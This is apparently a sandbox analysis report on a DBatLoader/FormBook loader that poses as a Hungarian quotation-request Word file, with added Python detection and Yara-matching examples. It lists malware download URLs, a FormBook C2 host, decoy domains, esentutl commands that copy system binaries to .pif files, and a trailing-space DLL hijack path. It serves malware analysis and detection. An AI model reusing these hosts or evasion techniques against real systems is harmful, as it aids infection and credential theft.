Windows Analysis Report
Árajánlat kérés MOL093478524·docx.exe

Overview

General Information

Sample name: Árajánlat kérés MOL093478524·docx.exe (Hungarian, "Quotation request"; the sandbox escapes non-ASCII characters in file names as #Uxxxx, which is how the name appears in the process tree and signature sources below)
Renamed because the original name contains non-ASCII characters. Note the U+00B7 middle dot in "MOL093478524·docx.exe": the file is a plain .exe whose name ends in "docx" to pass as a Word document.
Original sample name: Árajánlat kérés MOL093478524·docx.exe
Analysis ID: 1553904
MD5: ffd79398ecb6b74ae4e751157796870b
SHA1: cedc86d9d511aa0b4ee0102cfcda83c7eb296afc
SHA256: 5166f1f0d6693793e12932e324f36450126c907365ba4a9d45388831121bfcb1
Tags: exe, HUN, user-smica83

Detection

Detection: DBatLoader, FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected DBatLoader
Yara detected FormBook
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates a thread in another existing process (thread injection)
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to resolve many domain names, but no domain seems valid
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Child Processes Of SndVol.exe
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe (PID: 6928 cmdline: "C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe" MD5: FFD79398ECB6B74AE4E751157796870B)
    • cmd.exe (PID: 7164 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\rqbnwzgR.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • esentutl.exe (PID: 3756 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • esentutl.exe (PID: 8 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
    • SndVol.exe (PID: 2664 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • netsh.exe (PID: 4948 cmdline: "C:\Windows\SysWOW64\netsh.exe" MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
          • cmd.exe (PID: 7156 cmdline: /c del "C:\Windows\SysWOW64\SndVol.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
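The tree above shows three host-side behaviours worth alerting on independently of any AV verdict: esentutl.exe used as a copy utility (/y source /d destination) to clone cmd.exe and ping.exe into C:\Users\Public as alpha.pif and xpha.pif, a DLL written under "C:\Windows \SysWOW64\" (trailing space after "Windows", see the Sigma hit further down), and explorer.exe started by SndVol.exe. The following detection logic is an added example, not part of the Joe Sandbox report. The events are constructed to mirror the tree plus two benign controls; the field names (EventID, Image, ParentImage, CommandLine, TargetFilename) follow Sysmon's naming, which is an assumption about the log source, not something the report states.

```python
"""Detection logic for the host-side behaviour in the process tree above (added example)."""
import ntpath
import shlex

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# Constructed Sysmon-style events: EventID 1 = process create, EventID 11 = file create.
EVENTS = [
    {"EventID": 11, "Image": r"C:\Users\user\Desktop\sample.exe",
     "TargetFilename": r"C:\Windows \SysWOW64\NETUTILS.dll"},
    {"EventID": 1, "Image": r"C:\Windows\System32\esentutl.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o"},
    {"EventID": 1, "Image": r"C:\Windows\System32\esentutl.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o"},
    {"EventID": 1, "Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\SysWOW64\SndVol.exe",
     "CommandLine": r"C:\Windows\Explorer.EXE"},
    # Benign controls: an ordinary esentutl invocation and a write into the real SysWOW64.
    {"EventID": 1, "Image": r"C:\Windows\System32\esentutl.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"esentutl /mh C:\Windows\System32\config\systemprofile\edb.log"},
    {"EventID": 11, "Image": r"C:\Windows\System32\svchost.exe",
     "TargetFilename": r"C:\Windows\SysWOW64\netutils.dll"},
]


def in_system_dir(path):
    return path.lower().startswith(SYSTEM_DIRS)


def trailing_space_path(path):
    """True if any directory component ends in a space, e.g. "C:\\Windows \\SysWOW64".
    "Windows " is a different directory from "Windows", one an unprivileged process
    can create, while the full path string looks like the protected one."""
    return any(part != part.rstrip(" ") for part in path.split("\\")[:-1])


def esentutl_copy(cmdline):
    """Return (src, dst) when cmdline is an esentutl /y <src> /d <dst> copy, else None.
    The report records the command with doubled backslashes; both forms are accepted."""
    toks = shlex.split(cmdline.replace("\\\\", "\\"), posix=False)
    if not toks or ntpath.basename(toks[0]).lower() not in ("esentutl", "esentutl.exe"):
        return None
    lowered = [t.lower() for t in toks]
    try:
        return toks[lowered.index("/y") + 1], toks[lowered.index("/d") + 1]
    except (ValueError, IndexError):
        return None


def detect(events):
    """Run the three checks over the events and return (rule, detail) tuples."""
    alerts = []
    for ev in events:
        if ev["EventID"] == 11 and trailing_space_path(ev["TargetFilename"]):
            alerts.append(("dll_search_order_space_in_path", ev["TargetFilename"]))
        if ev["EventID"] != 1:
            continue
        copy = esentutl_copy(ev["CommandLine"])
        # A system binary copied out of System32/SysWOW64 under a new name (here *.pif).
        if copy and in_system_dir(copy[0]) and not in_system_dir(copy[1]):
            alerts.append(("esentutl_copies_system_binary", "%s -> %s" % copy))
        # SndVol.exe (the volume mixer) has no business spawning other processes.
        if ntpath.basename(ev.get("ParentImage", "")).lower() == "sndvol.exe":
            alerts.append(("uncommon_child_of_sndvol", ev["Image"]))
    return alerts


if __name__ == "__main__":
    for rule, detail in detect(EVENTS):
        print("%-34s %s" % (rule, detail))
```

Running the block prints four alerts for the constructed events (one per dropped DLL path, one per esentutl copy, one for the explorer.exe child) and nothing for the two controls. The renamed copies matter because later stages run as alpha.pif (a cmd.exe) and the hollowed SndVol.exe runs from SysWOW64, so image-name based allow-lists see only Microsoft binaries.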
Malware Configuration

DBatLoader: {"Download Url": ["http://voievodulgelu.ro/244_Rgzwnbqrkpn", "http://mbsngradnja.com/244_Rgzwnbqrkpn"]}
FormBook: {"C2 list": ["www.atingdilse.site/d05n/"], "decoy": ["cdrama.site", "ise142.xyz", "ynthia-mcc-lin-tick.link", "askabirokulmumkun.online", "tpdayakslot888.top", "adikoyescortatings.xyz", "ybzert.online", "ujdd.shop", "90yhj301.top", "2xiezhen.net", "uickerandeasier.store", "ode.xyz", "9838.xyz", "gsbet.net", "ustavoglins.store", "evelupcasino.club", "826mza.top", "eanliving.site", "87crxy301.top", "amzlo.shop", "rmt.xyz", "cductcleaning102.fun", "hechefsexperience.info", "joops.music", "ultangaziescortbayanlari.online", "arot-chat.online", "dipisci-harum.site", "kd00.top", "caffolding-17822.bond", "wdes83904.vip", "nilink.education", "egos.design", "nline-advertising-95315.bond", "ental-implants-50062.bond", "apaescortatings.xyz", "r-outsourcing-69869.bond", "card.boats", "affodilconsignment.shop", "rafting-minecraft.link", "ittycozy.shop", "itchen-appliances-55012.bond", "rnuah.xyz", "h8gq8vzm9j.buzz", "espasaigon.online", "ursing-caregiver-jobs-za-3.bond", "yzsports200.xyz", "enies.top", "zziof2.xyz", "estspacefox.shop", "buod.info", "ichetgouttiere.link", "egakids.shop", "xc31.top", "ebsiteclients.online", "trl-migrate.online", "uantumgrovedesignstudio.online", "ajagacor777bar.art", "ynapticshiftai.tech", "irdewagacor89.lat", "amlouis.music", "aim79.online", "upta.bio", "druei.info", "utobahncollision.shop"]}
Yara matches in memory dumps (44 entries in total; the first five are shown)

Source: 00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmp
  Rule: JoeSecurity_FormBook
  Description: Yara detected FormBook
  Author: Joe Security

Source: 00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmp
  Rule: JoeSecurity_FormBook_1
  Description: Yara detected FormBook
  Author: Joe Security

Source: 00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmp
  Rule: Windows_Trojan_Formbook_1112e116
  Description: unknown
  Author: unknown
  Strings:
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83

Source: 00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmp
  Rule: Formbook_1
  Description: autogenerated rule brought to you by yara-signator
  Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmp
  Rule: Formbook
  Description: detect Formbook in memory
  Author: JPCERT/CC Incident Response Group
  Strings:
  • 0x18819:$sqlite3step: 68 34 1C 7B E1
  • 0x1892c:$sqlite3step: 68 34 1C 7B E1
  • 0x18848:$sqlite3text: 68 38 2A 90 C5
  • 0x1896d:$sqlite3text: 68 38 2A 90 C5
  • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18983:$sqlite3blob: 68 53 D8 7F 8C

Yara matches in unpacked PE files (16 entries in total; the first five are shown)

Source: 5.2.SndVol.exe.47c0000.0.raw.unpack
  Rule: JoeSecurity_FormBook
  Description: Yara detected FormBook
  Author: Joe Security

Source: 5.2.SndVol.exe.47c0000.0.raw.unpack
  Rule: JoeSecurity_FormBook_1
  Description: Yara detected FormBook
  Author: Joe Security

Source: 5.2.SndVol.exe.47c0000.0.raw.unpack
  Rule: Windows_Trojan_Formbook_1112e116
  Description: unknown
  Author: unknown
  Strings: $a1..$a4 at the same offsets (0x6251, 0x1cb90, 0xa9cf, 0x158b7) as in the memory-dump table above

Source: 5.2.SndVol.exe.47c0000.0.raw.unpack
  Rule: Formbook_1
  Description: autogenerated rule brought to you by yara-signator
  Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings: $sequence_0..$sequence_9 at the same offsets (0x9908, 0x9b82, 0x156b5, 0x151a1, 0x157b7, 0x1592f, 0xa59a, 0x1441c, 0xb293, 0x1b8f7, 0x1c8fa) as in the memory-dump table above

Source: 5.2.SndVol.exe.47c0000.0.raw.unpack
  Rule: Formbook
  Description: detect Formbook in memory
  Author: JPCERT/CC Incident Response Group
  Strings: $sqlite3step, $sqlite3text and $sqlite3blob at the same offsets (0x18819, 0x1892c, 0x18848, 0x1896d, 0x1885b, 0x18983) as in the memory-dump table above

The identical offsets in both tables show that the unpacked region at 0x47c0000 in SndVol.exe (process 5) and the 0x36300000 memory region are the same FormBook payload image.
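Each entry in the tables above is a Yara string (a hex byte sequence) together with the offset at which it matched; the same string can hit more than once, as $sequence_0 and the three JPCERT strings do. The JPCERT strings all begin with 0x68, the x86 opcode for "push imm32", so each of them pins a five-byte push of one 32-bit constant that the rule's string names associate with sqlite3 calls (FormBook reads browser SQLite databases). The following matcher is an added example, not from the report or from the rules' authors: it compiles Yara-style hex strings (byte pairs and "??" wildcards) to regular expressions, reports every match offset the way the tables do, and decodes a matched push back to its immediate. The buffer it scans is constructed here, so the offsets it yields are not the report's.

```python
"""Minimal Yara-style hex string matcher with push-imm32 decoding (added example)."""
import re
import struct

# A subset of the strings from the two tables above, in Yara hex-string syntax.
RULES = {
    "Formbook_1": {
        "$sequence_0": "03 C8 0F 31 2B C1 89 45 FC",
        "$sequence_8": "3C 54 74 04 3C 74 75 F4",
    },
    "Formbook (JPCERT/CC)": {
        "$sqlite3step": "68 34 1C 7B E1",
        "$sqlite3text": "68 38 2A 90 C5",
        "$sqlite3blob": "68 53 D8 7F 8C",
    },
}


def hex_string_to_regex(hexstr):
    """Compile "68 ?? ?? ?? ??"-style hex strings to a bytes regex. "??" matches any byte."""
    parts = []
    for tok in hexstr.split():
        if tok == "??":
            parts.append(b".")
        elif re.fullmatch(r"[0-9A-Fa-f]{2}", tok):
            parts.append(re.escape(bytes([int(tok, 16)])))
        else:
            raise ValueError("unsupported hex-string token: %r" % tok)
    return re.compile(b"".join(parts), re.DOTALL)


def scan(buf, rules):
    """Return {rule: {string_name: [offsets]}} for every string that matches at least once."""
    hits = {}
    for rule, strings in rules.items():
        for name, hexstr in strings.items():
            offsets = [m.start() for m in hex_string_to_regex(hexstr).finditer(buf)]
            if offsets:
                hits.setdefault(rule, {})[name] = offsets
    return hits


def decode_push_imm32(buf, offset):
    """Decode the 32-bit little-endian immediate of a "push imm32" (opcode 0x68) at offset."""
    if buf[offset] != 0x68:
        raise ValueError("no push imm32 at 0x%x" % offset)
    return struct.unpack_from("<I", buf, offset + 1)[0]


def build_sample():
    """Constructed 0x60-byte buffer with some of the rule strings planted at known offsets."""
    buf = bytearray(b"\x90" * 0x60)
    seq0 = bytes.fromhex("03C80F312BC18945FC")
    buf[0x10:0x19] = seq0                            # $sequence_0, first occurrence
    buf[0x50:0x59] = seq0                            # $sequence_0, second occurrence
    buf[0x20:0x25] = bytes.fromhex("68341C7BE1")     # $sqlite3step
    buf[0x30:0x35] = bytes.fromhex("68382A90C5")     # $sqlite3text
    buf[0x40:0x45] = bytes.fromhex("6853D87F8C")     # $sqlite3blob
    return bytes(buf)


if __name__ == "__main__":
    sample = build_sample()
    for rule, strings in scan(sample, RULES).items():
        for name, offsets in strings.items():
            for off in offsets:
                extra = " push 0x%08X" % decode_push_imm32(sample, off) if sample[off] == 0x68 else ""
                print("%-22s 0x%x:%s%s" % (rule, off, name, extra))
```

Against a real dump (for example the .sdmp file named in the table, read with open(path, "rb").read()) the same scan() call reproduces the offsets the report lists; decoding the pushes gives the constants the payload compares against at runtime, which is what makes these strings more stable than code sequences the compiler may reorder.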

          System Summary

Sigma hit: DLL Search Order Hijackig Via Additional Space in Path (authors: frack113, Nasreddine Bencherchali)
  Source: File created
  Data: EventID: 11, Image: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, ProcessId: 6928, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
  Note the space after "Windows": the DLL goes to "C:\Windows \SysWOW64\", a directory the unprivileged sample created itself, not to the real C:\Windows\SysWOW64\.

Sigma hit: Uncommon Child Processes Of SndVol.exe (author: X__Junior (Nextron Systems))
  Source: Process started
  Data: Command: C:\Windows\Explorer.EXE, CommandLine: C:\Windows\Explorer.EXE, CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: C:\Windows\System32\SndVol.exe, ParentImage: C:\Windows\SysWOW64\SndVol.exe, ParentProcessId: 2664, ParentProcessName: SndVol.exe, ProcessCommandLine: C:\Windows\Explorer.EXE, ProcessId: 2580, ProcessName: explorer.exe
Suricata alerts

Timestamp                       | SID     | Severity | Classtype                     | Source IP     | Source Port | Destination IP | Destination Port | Protocol
2024-11-11T19:17:05.224463+0100 | 2022930 | 1        | A Network Trojan was detected | 20.109.210.53 | 443         | 192.168.2.4    | 49734            | TCP
2024-11-11T19:17:43.068110+0100 | 2022930 | 1        | A Network Trojan was detected | 20.109.210.53 | 443         | 192.168.2.4    | 49741            | TCP


          AV Detection

Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, Avira: detected
Source: http://voievodulgelu.ro/244_Rgzwnbqrkpn, Avira URL Cloud: Label: malware
Source: http://mbsngradnja.com:80/244_Rgzwnbqrkpn, Avira URL Cloud: Label: malware
Source: http://mbsngradnja.com/244_Rgzwnbqrkpn, Avira URL Cloud: Label: malware
Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, Malware Configuration Extractor: DBatLoader {"Download Url": ["http://voievodulgelu.ro/244_Rgzwnbqrkpn", "http://mbsngradnja.com/244_Rgzwnbqrkpn"]}
Source: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Malware Configuration Extractor: FormBook {"C2 list": ["www.atingdilse.site/d05n/"], "decoy": ["cdrama.site", "ise142.xyz", "ynthia-mcc-lin-tick.link", "askabirokulmumkun.online", "tpdayakslot888.top", "adikoyescortatings.xyz", "ybzert.online", "ujdd.shop", "90yhj301.top", "2xiezhen.net", "uickerandeasier.store", "ode.xyz", "9838.xyz", "gsbet.net", "ustavoglins.store", "evelupcasino.club", "826mza.top", "eanliving.site", "87crxy301.top", "amzlo.shop", "rmt.xyz", "cductcleaning102.fun", "hechefsexperience.info", "joops.music", "ultangaziescortbayanlari.online", "arot-chat.online", "dipisci-harum.site", "kd00.top", "caffolding-17822.bond", "wdes83904.vip", "nilink.education", "egos.design", "nline-advertising-95315.bond", "ental-implants-50062.bond", "apaescortatings.xyz", "r-outsourcing-69869.bond", "card.boats", "affodilconsignment.shop", "rafting-minecraft.link", "ittycozy.shop", "itchen-appliances-55012.bond", "rnuah.xyz", "h8gq8vzm9j.buzz", "espasaigon.online", "ursing-caregiver-jobs-za-3.bond", "yzsports200.xyz", "enies.top", "zziof2.xyz", "estspacefox.shop", "buod.info", "ichetgouttiere.link", "egakids.shop", "xc31.top", "ebsiteclients.online", "trl-migrate.online", "uantumgrovedesignstudio.online", "ajagacor777bar.art", "ynapticshiftai.tech", "irdewagacor89.lat", "amlouis.music", "aim79.online", "upta.bio", "druei.info", "utobahncollision.shop"]}
Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, ReversingLabs: Detection: 47%
Source: Yara match, file source: 5.2.SndVol.exe.47c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 5.2.SndVol.exe.47c0000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000005.00000002.1887410706.0000000036330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000007.00000002.4169626171.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.1804179416.00000000216EA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.1804731212.0000000021A01000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000007.00000002.4169882898.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000007.00000002.4169921124.0000000001090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.1803550151.00000000211C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, Joe Sandbox ML: detected
Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
          Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: SndVol.pdbGCTL source: explorer.exe, 00000006.00000002.4182572675.0000000010F3F000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000007.00000002.4169965326.0000000001106000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000007.00000002.4171199207.0000000003D8F000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: netsh.pdb source: SndVol.exe, 00000005.00000003.1857901713.000000000279F000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000005.00000003.1857901713.000000000278F000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000005.00000002.1887842160.0000000036530000.00000040.10000000.00040000.00000000.sdmp, netsh.exe, netsh.exe, 00000007.00000002.4170356503.0000000001560000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: easinvoker.pdb source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1699414288.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1802025205.0000000020680000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1700194533.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000003.00000003.1766177513.0000000005350000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.3.dr
          Source: Binary string: wntdll.pdbUGP source: SndVol.exe, 00000005.00000003.1782780302.00000000363B2000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000005.00000003.1780846168.0000000036205000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000007.00000003.1861588490.000000000368D000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000007.00000003.1857987184.00000000012FF000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000007.00000002.4170553406.00000000039DE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000007.00000002.4170553406.0000000003840000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: netsh.pdbGCTL source: SndVol.exe, 00000005.00000003.1857901713.000000000279F000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000005.00000003.1857901713.000000000278F000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000005.00000002.1887842160.0000000036530000.00000040.10000000.00040000.00000000.sdmp, netsh.exe, 00000007.00000002.4170356503.0000000001560000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000004.00000003.1771269701.0000000005700000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.4.dr
          Source: Binary string: wntdll.pdb source: SndVol.exe, SndVol.exe, 00000005.00000003.1782780302.00000000363B2000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000005.00000003.1780846168.0000000036205000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000007.00000003.1861588490.000000000368D000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000007.00000003.1857987184.00000000012FF000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000007.00000002.4170553406.00000000039DE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000007.00000002.4170553406.0000000003840000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: easinvoker.pdbH source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmp
